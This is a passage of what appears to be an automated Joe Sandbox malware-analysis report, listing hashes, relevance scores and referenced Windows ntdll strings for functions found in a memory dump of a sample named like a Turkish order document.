                                                                  • Instruction Fuzzy Hash: 3261E076204780AFE311CB28D844F5BB7E9FF84758F140869F9948B3A1DB74E945CBA2
                                                                  Function 32DE11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                  • API String ID: 0-336120773
                                                                  • Opcode ID: 69455c4cd2dade254adf378beebeb5171b40c3480e5cf8af5472d4e4e1311854
                                                                  • Instruction ID: b73d2eb3c726134341c106a310e61e049852ff62d7256b91acb595c083ed4cc4
                                                                  • Opcode Fuzzy Hash: 69455c4cd2dade254adf378beebeb5171b40c3480e5cf8af5472d4e4e1311854
                                                                  • Instruction Fuzzy Hash: 76317C75200254EFE705CBA8CC86F5AB3E8FF49B68F508155E842DB3A0DA60ED84DE65
                                                                  Function 32D29148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                  • API String ID: 0-1391187441
                                                                  • Opcode ID: 725cb64e8d0e87e152bda3c92b0b201ed053bb05231784d6649858cef7b5b6a1
                                                                  • Instruction ID: 707a1fcf2ef57ec01a8c417c3b069a5de5a6ee48fc4313e2f98c975bd02bb46a
                                                                  • Opcode Fuzzy Hash: 725cb64e8d0e87e152bda3c92b0b201ed053bb05231784d6649858cef7b5b6a1
                                                                  • Instruction Fuzzy Hash: 95318F76A00254EFEB02CB55D884FDAB7B9EF45768F248055E825AB390DBB0ED44CE60
                                                                  Function 32D37152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 20e8fbcf6595d8c5990df693e5b0ac4383fdae7c1c600f88c17e02c4b1a5579a
                                                                  • Instruction ID: 8e4a0ed818c5e5862416e535f0abf4f153a9cf773fc513351870347c9ba75de9
                                                                  • Opcode Fuzzy Hash: 20e8fbcf6595d8c5990df693e5b0ac4383fdae7c1c600f88c17e02c4b1a5579a
                                                                  • Instruction Fuzzy Hash: 4051E176A01B06EFFB0ACF64C944BADB7B4BF04755F108169E95293390EBB09905CF90
                                                                  Function 32D3B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                  • API String ID: 0-1145731471
                                                                  • Opcode ID: 6b3a41576444d8a7e6eed86d7cf04c243198d1c6a419f6f02de4e25500c2fca2
                                                                  • Instruction ID: 499364a4c72f94eb3eba2c05ed0c8c21e82d8a41bf7423d26fe7553062f892bc
                                                                  • Opcode Fuzzy Hash: 6b3a41576444d8a7e6eed86d7cf04c243198d1c6a419f6f02de4e25500c2fca2
                                                                  • Instruction Fuzzy Hash: 72B1ADB9A057449FDB16CF69C980B9DB7B2FF44358F144529E951EBB80DB70E840CB60
                                                                  Function 32DB368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                  • API String ID: 0-2391371766
                                                                  • Opcode ID: 99e258aef7374623606c33def192cf1d04bff9ea6446652127c7f257c344af47
                                                                  • Instruction ID: cb683b3bf28deebd1d3c3b7f8ae03a7abf35cbdb25f2550b3cdc1f2cb24308f7
                                                                  • Opcode Fuzzy Hash: 99e258aef7374623606c33def192cf1d04bff9ea6446652127c7f257c344af47
                                                                  • Instruction Fuzzy Hash: D3B122B5608381AFEB41DF54C8A0F5BB7E8EF45714F510929FA42A7750CBB0E844CB92
                                                                  Function 32D2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                  • API String ID: 0-2779062949
                                                                  • Opcode ID: 30bf697a41593cad1679dc4ae34f268b79b369da57fc3d619e36c814176d9195
                                                                  • Instruction ID: 3531b921e8bff339c35cf18769498b0b983d51c2af95276189d721c78bdbcfc1
                                                                  • Opcode Fuzzy Hash: 30bf697a41593cad1679dc4ae34f268b79b369da57fc3d619e36c814176d9195
                                                                  • Instruction Fuzzy Hash: AFA19B759012299BDB21DF68CC88BEAB7B8EF04704F5041EAE908A7350DB759EC5CF50
                                                                  Function 32DC36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                  • API String ID: 0-318774311
                                                                  • Opcode ID: 9afa4e7f35fe59e6d58a5c66d1fe46043ec8c8a1ae53572b20ec334fde22eea8
                                                                  • Instruction ID: 2f5133cfb68002dd9cf412c469ef9c05edee3938849d4461c0549fcebd37b821
                                                                  • Opcode Fuzzy Hash: 9afa4e7f35fe59e6d58a5c66d1fe46043ec8c8a1ae53572b20ec334fde22eea8
                                                                  • Instruction Fuzzy Hash: 60817AB5608350AFE795CF18C884B6AB7E8FF89754F400929FD809BB90DB74D904CB62
                                                                  Function 32D6909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %$&$@
                                                                  • API String ID: 0-1537733988
                                                                  • Opcode ID: a43b7cda93c295a9c84eb6e7ad91145456b1ace2a2969653e4469e25caedd291
                                                                  • Instruction ID: 1a92fe5f92b5d447c65f2174673c435e991a9922be45b71eff06d74debefb560
                                                                  • Opcode Fuzzy Hash: a43b7cda93c295a9c84eb6e7ad91145456b1ace2a2969653e4469e25caedd291
                                                                  • Instruction Fuzzy Hash: 6071AF745093419FD704CF24C990AABFBE5BF8875CFA0891DE89A87390CB70D905CBA2
                                                                  Function 32E0B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 32E0B82A
                                                                  • TargetNtPath, xrefs: 32E0B82F
                                                                  • GlobalizationUserSettings, xrefs: 32E0B834
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                  • API String ID: 0-505981995
                                                                  • Opcode ID: b2d1c6149ab40e54c67d9e9f87061add247adaea1b136815f04136a3b8627e81
                                                                  • Instruction ID: 0e139cf869e6b4287d40b7357604bc03be753e8a1d9bad91275762b914eb5bd7
                                                                  • Opcode Fuzzy Hash: b2d1c6149ab40e54c67d9e9f87061add247adaea1b136815f04136a3b8627e81
                                                                  • Instruction Fuzzy Hash: 5F61C472D41228ABDB21DF55DC89BD9B7B8FF04718F4181E9A908A7350CB749E85CFA0
                                                                  Function 32D2F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • HEAP: , xrefs: 32D8E6B3
                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 32D8E6C6
                                                                  • HEAP[%wZ]: , xrefs: 32D8E6A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                  • API String ID: 0-1340214556
                                                                  • Opcode ID: 5e23e1087794d0e972f67752f94361985bad0848dbf8d637b5d06158f6545692
                                                                  • Instruction ID: beb1f2200eacb80cec53be5f7e61c66d0debbe5c10bccd855f97e99ae175e80c
                                                                  • Opcode Fuzzy Hash: 5e23e1087794d0e972f67752f94361985bad0848dbf8d637b5d06158f6545692
                                                                  • Instruction Fuzzy Hash: 6651D5B5604784EFE312CB68C845B96FBF8FF05348F1444A5E9819B792DB74E940CB61
                                                                  Function 32D616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpAllocateTls, xrefs: 32DA1B40
                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32DA1B39
                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 32DA1B4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                  • API String ID: 0-4274184382
                                                                  • Opcode ID: ace269ba0f6b665949f527a61e1682cce5c46ed0f9ed37db3a4b2eb49ceafa30
                                                                  • Instruction ID: e57eb165b970e9fbd2df3d99ebabf3d4fc3d02b8189b6265ef57832d460eb71c
                                                                  • Opcode Fuzzy Hash: ace269ba0f6b665949f527a61e1682cce5c46ed0f9ed37db3a4b2eb49ceafa30
                                                                  • Instruction Fuzzy Hash: 534188B5A01608EFDB05CFA8C941AAEBBF5FF48B18F508519E406A7710DB75A841CBA0
                                                                  Function 32DEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 32DEC1C5
                                                                  • @, xrefs: 32DEC1F1
                                                                  • PreferredUILanguages, xrefs: 32DEC212
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                  • API String ID: 0-2968386058
                                                                  • Opcode ID: ad661267733219919cd1aa7070d00231a542b3fcaffe8d5aef2f3fe6beebbe8f
                                                                  • Instruction ID: 86985484ad37fd83795e76f021ec86ccd2b224adc804de855428c90c62d34bf0
                                                                  • Opcode Fuzzy Hash: ad661267733219919cd1aa7070d00231a542b3fcaffe8d5aef2f3fe6beebbe8f
                                                                  • Instruction Fuzzy Hash: 25415275D00209EFDB01DED4C891FDEB7B8AB14B48F50816AE906B7350DBB49A44CB60
                                                                  Function 32DC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                  • API String ID: 0-1373925480
                                                                  • Opcode ID: 400d8c4c867c9f36f326531a05c2827ce98f3ac867338e3c46f2c3b260fdb4e0
                                                                  • Instruction ID: 4dd65735221aa3430db4b753e08413567a03dfd00f3a2f190adef4ecd59ab3b0
                                                                  • Opcode Fuzzy Hash: 400d8c4c867c9f36f326531a05c2827ce98f3ac867338e3c46f2c3b260fdb4e0
                                                                  • Instruction Fuzzy Hash: 4341D1729007A8CBEB16CBE4C940B9DBBB8EF55344F24045AD842FB795DF748901CB20
                                                                  Function 32D633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() passed the empty activation context data, xrefs: 32DA29FE
                                                                  • RtlCreateActivationContext, xrefs: 32DA29F9
                                                                  • Actx , xrefs: 32D633AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                  • API String ID: 0-859632880
                                                                  • Opcode ID: a80cb7e7b74b99608adefd1f71e32292d8dcb9b2fab8ee933814f430fa98edca
                                                                  • Instruction ID: caa6f2f733f02cd24e1d5de58fd514f97c96b879b0a2081be6a41a294620a321
                                                                  • Opcode Fuzzy Hash: a80cb7e7b74b99608adefd1f71e32292d8dcb9b2fab8ee933814f430fa98edca
                                                                  • Instruction Fuzzy Hash: 273122326403019FEB16CE69D894FA677A4FF44B18F818469ED059FB91CF70E851CBA0
                                                                  Function 32D61607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 32DA1A40
                                                                  • LdrpInitializeTls, xrefs: 32DA1A47
                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 32DA1A51
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                  • API String ID: 0-931879808
                                                                  • Opcode ID: 3b112fc6d7224c73012c3220ab20e6c7eea1b52841b2b06a480c3b73453c5ac1
                                                                  • Instruction ID: 18e36be6ed66b6e64ee675f55c912d06bcfc5dd46e04c307736f001bde1cf787
                                                                  • Opcode Fuzzy Hash: 3b112fc6d7224c73012c3220ab20e6c7eea1b52841b2b06a480c3b73453c5ac1
                                                                  • Instruction Fuzzy Hash: 5A310975A40344EBE7149B98CA46FBA7368FB40F58F850519E582B7380EBB0ED81C7A0
                                                                  Function 32D71270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • BuildLabEx, xrefs: 32D7130F
                                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 32D7127B
                                                                  • @, xrefs: 32D712A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                  • API String ID: 0-3051831665
                                                                  • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                  • Instruction ID: 96dbef8c7054ad5390b8e43dd57be5c29034d9314d6b0fc06cfe3a61529137b5
                                                                  • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                  • Instruction Fuzzy Hash: 7631BF72900658AFDF11DFA9CC44EEEBBB9EF84B54F004125E914A7360DB78DA05CBA0
                                                                  Function 32DB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpInitializationFailure, xrefs: 32DB20FA
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32DB2104
                                                                  • Process initialization failed with status 0x%08lx, xrefs: 32DB20F3
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2986994758
                                                                  • Opcode ID: 5d03fc0bbc832312ebc64b57535ce103382181cc977c8b1c72a8d16eeb8c5e05
                                                                  • Instruction ID: 229b1459fc9bd14c67785f5ed4271d354b403b8d0a6c819ee0a1584338f7f008
                                                                  • Opcode Fuzzy Hash: 5d03fc0bbc832312ebc64b57535ce103382181cc977c8b1c72a8d16eeb8c5e05
                                                                  • Instruction Fuzzy Hash: ACF04675A40308FBEB10EA0CEC17F9A3768EF40B84F800465FA027B780D6B0A984CED0
                                                                  Function 32D403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: #%u
                                                                  • API String ID: 48624451-232158463
                                                                  • Opcode ID: 1148db35101ab0c52765c7abfa14158934aa8c17ca74fbfd609d3a2fe65f5c66
                                                                  • Instruction ID: ae83947d5f1100b2072b303263de6512c8b532c56e0657097209d8a2d8a9061d
                                                                  • Opcode Fuzzy Hash: 1148db35101ab0c52765c7abfa14158934aa8c17ca74fbfd609d3a2fe65f5c66
                                                                  • Instruction Fuzzy Hash: 1B715875A0024A9FDB05CFA8D990BAEB7B8EF08344F544065E905A7351EB74ED41CB61
                                                                  Function 32DD705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: kLsE
                                                                  • API String ID: 3446177414-3058123920
                                                                  • Opcode ID: be9f96b67c629f6d5790d6b3d9492cac672e01b21bbb77d04e5cd111675c2f69
                                                                  • Instruction ID: 3ef288272902fbfb33bf7add7e1a743eb2846fa038c7556c560a7f76ac6e5f7b
                                                                  • Opcode Fuzzy Hash: be9f96b67c629f6d5790d6b3d9492cac672e01b21bbb77d04e5cd111675c2f69
                                                                  • Instruction Fuzzy Hash: F5413B725437514AF311BB60C8467653BA4EF01F68FA21B58ED51AA3C5CBB044C3CBA0
                                                                  Function 32D452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
